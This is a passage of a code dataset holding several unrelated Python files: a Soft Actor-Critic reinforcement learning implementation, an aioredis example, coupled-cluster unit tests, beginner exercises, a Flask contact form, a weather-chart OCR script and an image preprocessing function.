experiences from the environment by acting randomly until this timestep.\\\n Defaults to 10000.\n replay_buffer_size (int): capacity of the replay buffer. 
Defaults to 1000000.\n '''\n\n gamma: float = 0.99\n learning_rate: float = 3.0*1e-4\n batch_size: int = 256\n tau: float = 0.005\n environment_steps: int = 1\n gradient_steps: int = 1\n target_entropy: Optional[float] = None\n initial_temperature: Optional[float] = None\n fix_temperature: bool = False\n start_timesteps: int = 10000\n replay_buffer_size: int = 1000000\n\n def __post_init__(self):\n '''__post_init__\n Check that the set values are in a valid range.\n '''\n self._assert_between(self.tau, 0.0, 1.0, 'tau')\n self._assert_between(self.gamma, 0.0, 1.0, 'gamma')\n self._assert_positive(self.gradient_steps, 'gradient_steps')\n self._assert_positive(self.environment_steps, 'environment_steps')\n if self.initial_temperature is not None:\n self._assert_positive(\n self.initial_temperature, 'initial_temperature')\n self._assert_positive(self.start_timesteps, 'start_timesteps')\n\n\nclass DefaultQFunctionBuilder(ModelBuilder[QFunction]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> QFunction:\n return SACQFunction(scope_name)\n\n\nclass DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> StochasticPolicy:\n return SACPolicy(scope_name, env_info.action_dim)\n\n\nclass DefaultSolverBuilder(SolverBuilder):\n def build_solver(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> nn.solver.Solver:\n return NS.Adam(alpha=algorithm_config.learning_rate)\n\n\nclass DefaultReplayBufferBuilder(ReplayBufferBuilder):\n def build_replay_buffer(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> ReplayBuffer:\n return ReplayBuffer(capacity=algorithm_config.replay_buffer_size)\n\n\nclass SAC(Algorithm):\n '''Soft Actor-Critic (SAC) algorithm implementation.\n\n This class implements the extended version of the Soft Actor-Critic (SAC) algorithm\n proposed by T. Haarnoja, et al. in the paper: \"Soft Actor-Critic Algorithms and Applications\"\n For details see: https://arxiv.org/abs/1812.05905\n\n This algorithm differs slightly from the implementation of the Soft Actor-Critic algorithm presented\n also by T. Haarnoja, et al. 
in the following paper: https://arxiv.org/abs/1801.01290\n\n The temperature parameter is adjusted automatically instead of providing reward scalar as a\n hyper parameter.\n\n Args:\n env_or_env_info \\\n (gym.Env or :py:class:`EnvironmentInfo `):\n the environment to train or environment info\n config (:py:class:`SACConfig `): configuration of the SAC algorithm\n q_function_builder (:py:class:`ModelBuilder[QFunction] `):\n builder of q function models\n q_solver_builder (:py:class:`SolverBuilder `):\n builder of q function solvers\n policy_builder (:py:class:`ModelBuilder[StochasticPolicy] `):\n builder of actor models\n policy_solver_builder (:py:class:`SolverBuilder `):\n builder of policy solvers\n temperature_solver_builder (:py:class:`SolverBuilder `):\n builder of temperature solvers\n replay_buffer_builder (:py:class:`ReplayBufferBuilder `):\n builder of replay_buffer\n '''\n\n # type declarations to type check with mypy\n # NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar\n # See https://mypy.readthedocs.io/en/stable/class_basics.html for details\n _config: SACConfig\n _q1: QFunction\n _q2: QFunction\n _train_q_functions: List[QFunction]\n _train_q_solvers: Dict[str, nn.solver.Solver]\n _target_q_functions: List[QFunction]\n\n _pi: StochasticPolicy\n _temperature: MT.policy_trainers.soft_policy_trainer.AdjustableTemperature\n _temperature_solver: Optional[nn.solver.Solver]\n _replay_buffer: ReplayBuffer\n\n _environment_explorer: EnvironmentExplorer\n _policy_trainer: ModelTrainer\n _q_function_trainer: ModelTrainer\n\n _eval_state_var: nn.Variable\n _eval_deterministic_action: nn.Variable\n _eval_probabilistic_action: nn.Variable\n\n _policy_trainer_state: Dict[str, Any]\n _q_function_trainer_state: Dict[str, Any]\n\n def __init__(self, env_or_env_info: Union[gym.Env, EnvironmentInfo],\n config: SACConfig = SACConfig(),\n q_function_builder: ModelBuilder[QFunction] = DefaultQFunctionBuilder(),\n q_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n policy_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),\n policy_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n temperature_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n replay_buffer_builder: ReplayBufferBuilder = DefaultReplayBufferBuilder()):\n super(SAC, self).__init__(env_or_env_info, config=config)\n\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n self._q1 = q_function_builder(scope_name=\"q1\", env_info=self._env_info, algorithm_config=self._config)\n self._q2 = q_function_builder(scope_name=\"q2\", env_info=self._env_info, algorithm_config=self._config)\n self._train_q_functions = [self._q1, self._q2]\n self._train_q_solvers = {q.scope_name: q_solver_builder(self._env_info, self._config)\n for q in self._train_q_functions}\n self._target_q_functions = [cast(QFunction, q.deepcopy('target_' + q.scope_name))\n for q in self._train_q_functions]\n\n self._pi = policy_builder(scope_name=\"pi\", env_info=self._env_info, algorithm_config=self._config)\n self._pi_solver = policy_solver_builder(self._env_info, self._config)\n\n self._temperature = MT.policy_trainers.soft_policy_trainer.AdjustableTemperature(\n scope_name='temperature',\n initial_value=self._config.initial_temperature)\n if not self._config.fix_temperature:\n self._temperature_solver = temperature_solver_builder(self._env_info, self._config)\n else:\n self._temperature_solver = None\n\n self._replay_buffer = 
replay_buffer_builder(self._env_info, self._config)\n\n @eval_api\n def compute_eval_action(self, state):\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n action, _ = self._compute_greedy_action(state, deterministic=True)\n return action\n\n def _before_training_start(self, env_or_buffer):\n # set context globally to ensure that the training runs on configured gpu\n context.set_nnabla_context(self._config.gpu_id)\n self._environment_explorer = self._setup_environment_explorer(env_or_buffer)\n self._policy_trainer = self._setup_policy_training(env_or_buffer)\n self._q_function_trainer = self._setup_q_function_training(\n env_or_buffer)\n\n def _setup_environment_explorer(self, env_or_buffer):\n if self._is_buffer(env_or_buffer):\n return None\n explorer_config = EE.RawPolicyExplorerConfig(\n warmup_random_steps=self._config.start_timesteps,\n initial_step_num=self.iteration_num,\n timelimit_as_terminal=False\n )\n explorer = EE.RawPolicyExplorer(policy_action_selector=self._compute_greedy_action,\n env_info=self._env_info,\n config=explorer_config)\n return explorer\n\n def _setup_policy_training(self, env_or_buffer):\n policy_trainer_config = MT.policy_trainers.SoftPolicyTrainerConfig(\n fixed_temperature=self._config.fix_temperature,\n target_entropy=self._config.target_entropy)\n policy_trainer = MT.policy_trainers.SoftPolicyTrainer(\n models=self._pi,\n solvers={self._pi.scope_name: self._pi_solver},\n temperature=self._temperature,\n temperature_solver=self._temperature_solver,\n q_functions=[self._q1, self._q2],\n env_info=self._env_info,\n config=policy_trainer_config)\n return policy_trainer\n\n def _setup_q_function_training(self, env_or_buffer):\n # training input/loss variables\n q_function_trainer_config = MT.q_value_trainers.SoftQTrainerConfig(\n reduction_method='mean',\n grad_clip=None)\n\n q_function_trainer = MT.q_value_trainers.SoftQTrainer(\n train_functions=self._train_q_functions,\n solvers=self._train_q_solvers,\n target_functions=self._target_q_functions,\n target_policy=self._pi,\n temperature=self._policy_trainer.get_temperature(),\n env_info=self._env_info,\n config=q_function_trainer_config)\n for q, target_q in zip(self._train_q_functions, self._target_q_functions):\n sync_model(q, target_q)\n return q_function_trainer\n\n def _run_online_training_iteration(self, env):\n for _ in range(self._config.environment_steps):\n self._run_environment_step(env)\n for _ in range(self._config.gradient_steps):\n self._run_gradient_step(self._replay_buffer)\n\n def _run_offline_training_iteration(self, buffer):\n self._sac_training(buffer)\n\n def _run_environment_step(self, env):\n experiences = self._environment_explorer.step(env)\n self._replay_buffer.append_all(experiences)\n\n def _run_gradient_step(self, replay_buffer):\n if self._config.start_timesteps < self.iteration_num:\n self._sac_training(replay_buffer)\n\n def _sac_training(self, replay_buffer):\n experiences, info = replay_buffer.sample(self._config.batch_size)\n (s, a, r, non_terminal, s_next, *_) = marshal_experiences(experiences)\n batch = TrainingBatch(batch_size=self._config.batch_size,\n s_current=s,\n a_current=a,\n gamma=self._config.gamma,\n reward=r,\n non_terminal=non_terminal,\n s_next=s_next,\n weight=info['weights'])\n\n self._q_function_trainer_state = self._q_function_trainer.train(batch)\n for q, target_q in zip(self._train_q_functions, self._target_q_functions):\n sync_model(q, target_q, tau=self._config.tau)\n self._policy_trainer_state = 
self._policy_trainer.train(batch)\n\n td_errors = np.abs(self._q_function_trainer_state['td_errors'])\n replay_buffer.update_priorities(td_errors)\n\n @eval_api\n def _compute_greedy_action(self, s, deterministic=False):\n # evaluation input/action variables\n s = add_batch_dimension(s)\n if not hasattr(self, '_eval_state_var'):\n self._eval_state_var = create_variable(1, self._env_info.state_shape)\n distribution = self._pi.pi(self._eval_state_var)\n self._eval_deterministic_action = distribution.choose_probable()\n self._eval_probabilistic_action = distribution.sample()\n set_data_to_variable(self._eval_state_var, s)\n if deterministic:\n self._eval_deterministic_action.forward()\n return np.squeeze(self._eval_deterministic_action.d, axis=0), {}\n else:\n self._eval_probabilistic_action.forward()\n return np.squeeze(self._eval_probabilistic_action.d, axis=0), {}\n\n def _models(self):\n models = [self._q1, self._q2, self._pi, self._temperature]\n return {model.scope_name: model for model in models}\n\n def _solvers(self):\n solvers = {}\n solvers[self._pi.scope_name] = self._pi_solver\n solvers.update(self._train_q_solvers)\n if self._temperature_solver is not None:\n solvers[self._temperature.scope_name] = self._temperature_solver\n return solvers\n\n @classmethod\n def is_supported_env(cls, env_or_env_info):\n env_info = EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \\\n else env_or_env_info\n return not env_info.is_discrete_action_env()\n\n @property\n def latest_iteration_state(self):\n latest_iteration_state = super(SAC, self).latest_iteration_state\n if hasattr(self, '_policy_trainer_state'):\n latest_iteration_state['scalar'].update({'pi_loss': self._policy_trainer_state['pi_loss']})\n if hasattr(self, '_q_function_trainer_state'):\n latest_iteration_state['scalar'].update({'q_loss': self._q_function_trainer_state['q_loss']})\n latest_iteration_state['histogram'].update(\n {'td_errors': self._q_function_trainer_state['td_errors'].flatten()})\n return latest_iteration_state\n","sub_path":"nnabla_rl/algorithms/sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":16743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517747602","text":"import asyncio\nimport aioredis\n\nloop = asyncio.get_event_loop()\n\n@asyncio.coroutine\ndef go():\n pool = yield from aioredis.create_pool(\n ('localhost', 6379),\n minsize=5, maxsize=10,\n loop=loop)\n with (yield from pool) as redis: # high-level redis API instance\n yield from redis.set('my-key', 'value')\n print((yield from redis.get('my-key')))\n pool.clear() # closing all open connections\n\nloop.run_until_complete(go())\nimport time\ntime.sleep(1)\n","sub_path":"aioredis/connection-pool.py","file_name":"connection-pool.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197778365","text":"import unittest\nimport numpy\n\nfrom cqcpy import test_utils\nimport cqcpy.spin_utils as spin_utils\nimport cqcpy.cc_energy as cc_energy\nimport cqcpy.cc_equations as cc_equations\n\nclass TamplEquationsTest(unittest.TestCase):\n def setUp(self):\n self.thresh = 1e-12\n self.no = 3\n self.nv = 5\n\n def test_ccsd_stanton(self):\n no = self.no\n nv = self.nv\n T1old,T2old = test_utils.make_random_T(no,nv)\n F,I = test_utils.make_random_integrals(no,nv)\n\n T1sim,T2sim = cc_equations.ccsd_simple(F, I, T1old, T2old)\n T1stn,T2stn = cc_equations.ccsd_stanton(F, I, 
T1old, T2old)\n\n D1 = numpy.linalg.norm(T1sim - T1stn)\n D2 = numpy.linalg.norm(T2sim - T2stn)\n s1 = D1 < self.thresh\n s2 = D2 < self.thresh\n e1 = \"Error in optimized T1\"\n e2 = \"Error in optimized T2\"\n self.assertTrue(s1,e1)\n self.assertTrue(s2,e2)\n\n def test_ccd(self):\n no = self.no\n nv = self.nv\n T1old,T2old = test_utils.make_random_T(no,nv)\n F,I = test_utils.make_random_integrals(no,nv)\n T1old = numpy.zeros((nv,no))\n\n T2 = cc_equations.ccd_simple(F, I, T2old)\n T1sd,T2sd = cc_equations.ccsd_simple(F, I, T1old, T2old)\n\n D = numpy.linalg.norm(T2 - T2sd)\n s = D < self.thresh\n err = \"Error in CCD T2\"\n self.assertTrue(s,err)\n\n def test_ucc_energy(self):\n noa = self.no\n nob = self.no\n nva = self.nv\n nvb = self.nv\n na = noa + nva\n nb = nob + nvb\n no = noa + nob\n nv = nva + nvb\n Faa = test_utils.make_random_F(noa, nva)\n Fbb = test_utils.make_random_F(nob, nvb)\n\n # Direct integrals over a,b orbitals\n Ia = test_utils.make_random_I_anti(noa,nva)\n Ib = test_utils.make_random_I_anti(nob,nvb)\n Iabab = test_utils.make_random_Ifull_gen(\n noa,nva,nob,nvb,noa,nva,nob,nvb)\n\n # Full antisymmetric spin-orbital tensor\n I = spin_utils.int_to_spin2(Ia, Ib, Iabab, noa, nva, nob, nvb)\n F = spin_utils.F_to_spin(Faa, Fbb, noa, nva, nob, nvb)\n\n # initial T\n T1a,T1b = test_utils.make_random_T1_spatial(noa,nva,nob,nvb)\n T2aa,T2ab,T2bb = test_utils.make_random_T2_spatial(noa,nva,nob,nvb)\n T1 = spin_utils.T1_to_spin(T1a,T1b,noa,nva,nob,nvb)\n T2 = spin_utils.T2_to_spin(T2aa,T2ab,T2bb,noa,nva,nob,nvb)\n\n E_ref = cc_energy.cc_energy(T1,T2,F.ov,I.oovv)\n E_out = cc_energy.ucc_energy((T1a,T1b),(T2aa,T2ab,T2bb),Faa.ov,Fbb.ov,Ia.oovv,Ib.oovv,Iabab.oovv)\n s = abs(E_ref - E_out) < self.thresh\n err = \"Error in ucc_energy\"\n self.assertTrue(s,err)\n\n def test_uccsd(self):\n noa = self.no\n nob = self.no\n nva = self.nv\n nvb = self.nv\n na = noa + nva\n nb = nob + nvb\n no = noa + nob\n nv = nva + nvb\n Faa = test_utils.make_random_F(noa, nva)\n Fbb = test_utils.make_random_F(nob, nvb)\n\n # Direct integrals over a,b orbitals\n Ia = test_utils.make_random_I_anti(noa,nva)\n Ib = test_utils.make_random_I_anti(nob,nvb)\n I_abab = test_utils.make_random_Ifull_gen(\n noa,nva,nob,nvb,noa,nva,nob,nvb)\n\n # Full antisymmetric spin-orbital tensor\n I = spin_utils.int_to_spin2(Ia, Ib, I_abab, noa, nva, nob, nvb)\n F = spin_utils.F_to_spin(Faa, Fbb, noa, nva, nob, nvb)\n\n # initial T\n T1a,T1b = test_utils.make_random_T1_spatial(noa,nva,nob,nvb)\n T2aa,T2ab,T2bb = test_utils.make_random_T2_spatial(noa,nva,nob,nvb)\n T1 = spin_utils.T1_to_spin(T1a,T1b,noa,nva,nob,nvb)\n T2 = spin_utils.T2_to_spin(T2aa,T2ab,T2bb,noa,nva,nob,nvb)\n\n # Update with spin orbitals\n S1ref,S2ref = cc_equations.ccsd_stanton(F, I, T1, T2)\n\n # Update with UCCSD\n S1,S2 = cc_equations.uccsd_stanton(Faa, Fbb, Ia, Ib, I_abab, \n (T1a,T1b), (T2aa,T2ab,T2bb))\n S1a,S1b = S1\n S2aa,S2ab,S2bb = S2\n S1 = spin_utils.T1_to_spin(S1a, S1b, noa, nva, nob, nvb)\n S2 = spin_utils.T2_to_spin(S2aa, S2ab, S2bb, noa, nva, nob, nvb)\n z1 = numpy.linalg.norm(S1 - S1ref) / numpy.sqrt(S1.size)\n z2 = numpy.linalg.norm(S2 - S2ref) / numpy.sqrt(S2.size)\n s1 = z1 < self.thresh\n s2 = z2 < self.thresh\n e1 = \"Error in UCCSD T1\"\n e2 = \"Error in UCCSD T2\"\n self.assertTrue(s1,e1)\n self.assertTrue(s2,e2)\n\nif __name__ == '__main__':\n 
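# added comment: runs every coupled-cluster amplitude test defined above\n    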
unittest.main()\n","sub_path":"cqcpy/tests/test_cc_ampl.py","file_name":"test_cc_ampl.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"529221518","text":"import pandas as pd\n\ndef print_words(string):\n \"\"\"\n Takes a given string, splits it into words and prints them to the screen\n \"\"\"\n words = string.split(' ')\n for word in words:\n print(word)\n\n# print_words('this is my first string')\n\n\ndef count_to(start, end, step=1):\n last_pos = start\n while last_pos <= end:\n print(last_pos)\n last_pos += step\n\n# print(count_to(25,50,5))\n\ndef print_chars(string):\n for char in string:\n print(char)\n\n# print_chars('this is my test string')\n\n\ndef print_vowels(string):\n # note: this prints the string with all vowels removed\n vowels = ['a','e', 'i', 'o', 'u']\n result = []\n for char in string:\n if char not in vowels:\n result.append(char)\n print(''.join(result))\n\n# print_vowels('Das is ein Test')\n\n\n\ndef odd_numbers(integers):\n for i in integers:\n if int(i) % 2 > 0:\n print(i)\n\ndef even_numbers(integers):\n for i in integers:\n if int(i) % 2 == 0:\n print(i)\n\ndef divisible_and_multiple(start, end, divisor=4, multiplicator=3):\n pos = start\n while pos <= end:\n if pos % divisor == 0 and pos % multiplicator == 0:\n print(pos)\n pos += 1\n\n# divisible_and_multiple(10, 100)\n\n# odd_numbers('123456')\n# even_numbers('1234567')\n\n# print(ord('a'))\n\n\n# print(98- ord('A'))\n\ndef square_of_sum(string):\n result = 0\n for char in string:\n result += int(char)\n return result ** 2\n\n# print(square_of_sum('1239485838'))\n# print(dir('directory'))\n\ndef filter_um(string):\n words = list(string.split(' '))\n return [word for word in words if word != \"um\"]\n\n# print(filter_um('lak um um um sdflkj um alsdkjf l um um '))\n# print(dir(list))\n\n# Checks whether two lotto draws contain exactly the same numbers\ndef match_lotto(given, match):\n if len(given) != len(match):\n return False\n for number in given:\n if number not in list(match):\n return False\n return True\n\n# print(match_lotto('12346', '23451'))\n\ndef selectively_append(string, length=5):\n return [word for word in string.split(' ') if len(word) > length]\n\n# print(selectively_append('lakjsdlfkj asdlf lkjkkkkk lkj lkj l lkj lkjlkj lkj lkj', 6))\n\n\ndef list_overlap(listA, listB):\n a = set(listA)\n b = set(listB)\n\n if len(a) > len(b):\n return [word for word in a if word in b]\n else:\n return [word for word in b if word in a]\n\n# b = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n# a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n# print(list_overlap(a,b))\n\n\n\ndef is_palindrome(string):\n \n string = string.lower()\n for i in range(len(string)):\n if string[i] != string[-i-1]:\n return False\n return True\n\n# print(is_palindrome('Anna'))\n\ndef keep_even(numbers):\n return [number for number in numbers if number % 2 == 0]\n# print(keep_even([1,2,3,4,5]))\n\n\n# Rock Paper Scissors\nimport random\ndef rock_paper_scissors(rounds=3):\n wins = []\n actions = ['Rock', 'Paper', 'Scissors']\n while True:\n print('Round:', len(wins) + 1)\n print(\"What's your choice?\")\n player = input(\"-->\")\n computer = actions[random.randint(0,2)]\n print('Computer chooses:', computer)\n \n # Generate a random gameplay\n if player == computer:\n pass\n elif player == 'Rock' and computer == 'Scissors':\n wins.append(0)\n elif player == \"Scissors\" and computer == \"Paper\":\n wins.append(0)\n elif player == \"Paper\" and computer == \"Rock\":\n wins.append(0)\n else:\n            
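# added comment: any other combination (including invalid input) counts as a win for the computer\n            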
wins.append(1)\n\n # Check if somebody already won\n if wins.count(0) == rounds:\n print('Congratulations! You beat it!!')\n break\n elif wins.count(1) == rounds:\n print('DAAAHHH! You sucked!')\n break\n\n print('You:', wins.count(0), 'Computer:', wins.count(1))\n\n# rock_paper_scissors()\n\ndef guessing_game(rng=9):\n goal = random.randint(1,rng)\n count = 0\n while True:\n count += 1\n print('Take a guess')\n guess = int(input('-->'))\n if guess == goal:\n print('You got it!! It took you only', count, 'tries...')\n break\n elif guess < goal:\n print('Guess higher')\n else:\n print('Guess lower')\n\n\n# guessing_game(1000)\n\n\ndef generate_password(length=5):\n s = \"abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()?\"\n return \"\".join(random.sample(s, length))\n\nprint(generate_password(16))\n# for i in range(49, 123):\n# print(chr(i))\n","sub_path":"DDD_Python/AAA_ProgrammingExercises/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389940625","text":"import re\nimport argparse\nimport type_analysis\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"programs\", help=\"The file(s) for which types will be detected\", nargs=\"*\", type=argparse.FileType('r'))\n\n#NOTE: Later, I must account for what happens if more parameters are present in the header than the contract, and vice versa\n\nfunc_regex = \"(def .*?\\(.*?\\):)\"\n\nclass Signature(object):\n\t#string,string -> None\n\tdef __init__(self, contract, header):\n\t\tself.name = self.__get_name(header)\n\t\tself.param_names = self.__get_param_names(header)\n\t\tself.params = dict.fromkeys(self.param_names)\n\t\tself.returns = []\n\t\tif contract is not None:\n\t\t\tparam_types,return_types = self.__get_contract_types(contract)\n\t\t\tfor param_name,param_type in zip(self.param_names,param_types):\n\t\t\t\tself.params[param_name] = param_type\n\t\t\tself.returns = return_types\n\t\n\tdef __setitem__(self, key, value):\n\t\tif key==\"return\":\n\t\t\tself.returns = value\n\n\t#string -> string\n\tdef __getitem__(self, key):\n\t\tif key==\"return\":\n\t\t\treturn self.returns\n\t\telse:\n\t\t\treturn self.params[key]\n\t\n\t#string -> list[string]\n\tdef __get_param_names(self, header):\n\t\tparam_list = header[header.find('(')+1:header.find(')')]\n\t\treturn [param.strip() for param in param_list.split(',')]\n\n\t#string -> list[string]\n\tdef __get_contract_types(self, contract):\n\t\tif contract is None:\n\t\t\treturn None,None\n\t\tparam_contract,return_contract = [piece.strip() for piece in contract.split(\"->\")]\n\t\tparam_types = [param.strip() for param in param_contract.split(',')]\n\t\treturn_types = [ret.strip() for ret in return_contract.split(',')]\n\t\treturn param_types,return_types\n\n\t#string -> string\n\tdef __get_name(self, header):\n\t\treturn header[:header.find('(')].strip()\n\n\t#None -> string\n\tdef __str__(self):\n\t\tcontract = \"\"\n\t\tfor param in self.param_names:\n\t\t\tcontract += \"{0},\".format(self.params[param])\n\t\tif contract.endswith(','):\n\t\t\tcontract = contract[:-1].strip()\n\t\t\n\t\tcontract += \" -> \"\n\n\t\tfor return_type in self.returns:\n\t\t\tcontract += \"{0},\".format(return_type)\n\t\tif contract.endswith(','):\n\t\t\tcontract = contract[:-1].strip()\n\t\t\n\t\treturn contract\n\nclass Function(object):\n\t#list[string] -> None\n\tdef __init__(self, func):\n\t\tself.contract,func = 
Function.get_contract(func)\n\t\tself.header,func = Function.get_header(func)\n\t\tself.body = func\n\n\t\tself.signature = Signature(self.contract,self.header)\n\t\tself.name = self.signature.name\n\n\t#None -> string\n\tdef __str__(self):\n\t\tstring = \"#{0}\\ndef {1}:\\n\".format(self.signature,self.header)\n\t\tfor line in self.body:\n\t\t\tstring += \"{0}\\n\".format(line)\n\t\treturn string\n\t\n\t#string -> string,string\n\t#NOTE: Later, also parse from function docstring\n\t@staticmethod\n\tdef get_contract(func):\n\t\tif func[0].startswith(\"#\"):\n\t\t\treturn func[0][1:],func[1:]\n\t\telse:\n\t\t\treturn None,func\n\n\t#string -> string,string\n\t@staticmethod\n\tdef get_header(func):\n\t\theader = func[0]\n\t\theader = header[4:header.find(':')].strip()\n\t\treturn header,func[1:]\n\t\n\t#string -> bool\n\t@staticmethod\n\tdef has_next(program_text):\n\t\treturn re.search(func_regex,program_text) is not None\n\n\t#string -> string,string,string,string\n\t@staticmethod\n\tdef next_func(program_text):\n\t\tif not Function.has_next(program_text):\n\t\t\traise StopIteration(\"All functions have been extracted from this file.\")\n\n\t\tpieces = re.split(func_regex,program_text)\n\t\tbefore = pieces[0]\n\t\tfunc,after = Function.__find_func(pieces[1],pieces[2].splitlines()[1:]) #NOTE: I ignore the first element of splitlines because it always seems to be empty. I DO NOT KNOW IF THIS IS THE CASE\n\t\tcontract = before.splitlines()[-1]\n\t\tif contract.startswith(\"#\") and \"->\" in contract:\n\t\t\tbefore = before[:before.find(contract)]\n\t\t\tfunc = \"{0}\\n{1}\".format(contract,func)\n\t\tend_pos = len(before) + len(func) + len(after)\n\t\tprogram_text = program_text[end_pos+1:]\n\t\treturn before.lstrip('\\n'),func.lstrip('\\n'),after.lstrip('\\n'),program_text\n\t\n\t#string,list[string] -> string,string\n\t@staticmethod\n\tdef __find_func(header,rest):\n\t\ttab_str = \"{0}\\t\".format(Function.__calc_indent(header))\n\n\t\tfunc = \"{0}\\n\".format(header)\n\t\tline_num = 0\n\t\tfor line in rest:\n\t\t\tif line.startswith(tab_str) or line.startswith(\"#\"):\n\t\t\t\tfunc += \"{0}\\n\".format(line)\n\t\t\t\tline_num += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tif func[-1]=='\\n':\n\t\t\tfunc = func[:-1]\n\t\t\n\t\tafter = \"\"\n\t\tfor line in rest[line_num:]:\n\t\t\tafter += \"{0}\\n\".format(line)\n\t\tif after[-1]=='\\n':\n\t\t\tafter = after[:-1]\n\n\t\treturn func,after\n\t\n\t#string -> string\n\t@staticmethod\n\tdef __calc_indent(line):\n\t\ttab_str = \"\"\n\t\tfor char in line:\n\t\t\tif char!='\\t':\n\t\t\t\treturn tab_str\n\t\t\ttab_str += '\\t'\n\t\treturn tab_str\n\n#string -> None\ndef detect_types(program):\n\tfunction_list = []\n\torig_program = program\n\toutside_func = \"\"\n\n\twhile Function.has_next(program):\n\t\tbefore,func,after,program = Function.next_func(program)\n\t\tif before!='':\n\t\t\toutside_func += before\n\t\tprogram = after + program\n\t\tfunction = Function(func.splitlines())\n\t\tfunction_list.append(function)\n\toutside_func += after\n\n\ttype_analysis.main(orig_program,function_list,outside_func)\n\n#None -> list[file]\ndef init():\n\targs = parser.parse_args()\n\tprograms = args.programs\n\treturn programs\n\nif __name__==\"__main__\":\n\t#program_list = init()\n\tprograms = [open(\"type_test.py\",'r')]\n\t\n\tfor program in 
programs:\n\t\tdetect_types(program.read())\n","sub_path":"archive/Python/type_sig.py","file_name":"type_sig.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612376514","text":"from flask_wtf import FlaskForm\r\nfrom wtforms.validators import InputRequired, Length, Regexp, Email, ValidationError\r\nfrom wtforms import StringField, TextAreaField, SubmitField\r\nfrom studentarchiveapp.models import UsersModel\r\n\r\n\r\nclass ContactForm(FlaskForm):\r\n name = StringField('Name', validators=[Length(min=3, max=20), InputRequired(),\r\n Regexp('^[a-z A-Z]+$', message='Invalid characters in name')])\r\n email = StringField('Email Address', validators=[Email(), InputRequired()])\r\n comment = TextAreaField('Comment', validators=[Length(min=5, max=100), InputRequired()])\r\n submit = SubmitField('Send')\r\n\r\n def validate_email(self, email):\r\n user = UsersModel.query.filter_by(email=email.data).first()\r\n if user is None:\r\n raise ValidationError('Sorry, that email doesn\\'t exist. You have to be a registered user to comment.')\r\n","sub_path":"studentarchiveapp/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262568044","text":"import urllib\nimport PIL\nimport Image\nimport ImageFilter\nimport pytesseract\nimport os\nfrom telegrampush import push\n# Source\nurl = 'http://www.bgc-jena.mpg.de/wetter/Chart_T.gif'\n\n\n# Download the image from the source\n\nurllib.urlretrieve(url, 'tmp.gif')\nprint (\"downloading\")\n\n# Crop the image\nimg = PIL.Image.open(\"tmp.gif\")\nwidth = img.size[0]\nheight = img.size[1]\nprint(width,height)\nimg = img.crop(\n (\n 278,\n 1,\n 518,\n 29\n )\n)\nimg = img.convert(mode=\"1\")\nimg = img.resize((600,60))\n# OCR the image\n#img = img.resize((200,80))\n#img = img.filter(ImageFilter.SMOOTH)\n#img = img.convert(mode=\"1\")\nimg.save(\"img.png\")\nimg = PIL.Image.open(\"img.png\")\nimg.load()\ntmp = pytesseract.image_to_string(img,config='--psm 3 -c tessedit_char_whitelist=0123456789-\".C')\nprint (tmp)\n\n\npush(\"Temperature outside: %s .\" % tmp)\nos.system('rm tmp.gif')\nos.system('rm img.png')\n","sub_path":"ltemp.py","file_name":"ltemp.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"608244053","text":"#!/usr/bin/python\n# -*- coding:utf8 -*-\n\nimport numpy as np\nfrom scipy import misc\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n# ================================================================\n# Preprocess the content image\n# ================================================================\ndef PreprocessContentImage(path, long_edge):\n img = misc.imread(path)\n print(img.shape)\n logging.info(\"\\t\\tload the content image, size = %s\", img.shape[:2])\n factor = float(long_edge) / max(img.shape[:2])\n new_size = (int(img.shape[0] * factor), int(img.shape[1] * factor))\n resized_img = misc.imresize(img, new_size)\n # sample = np.asarray(resized_img) * 256\n # swap axes to make image from (224, 224, 3) to (3, 224, 224)\n sample=np.transpose(resized_img,[2,0,1])\n sample=np.array(sample,dtype=np.float)\n # sub mean\n sample[0, :] -= 123.68\n sample[1, :] -= 116.779\n sample[2, :] -= 103.939\n logging.info(\"\\t\\tresize the content image to %s\", new_size)\n return np.resize(sample, (1, 3, sample.shape[1], sample.shape[2]))\n\n# 
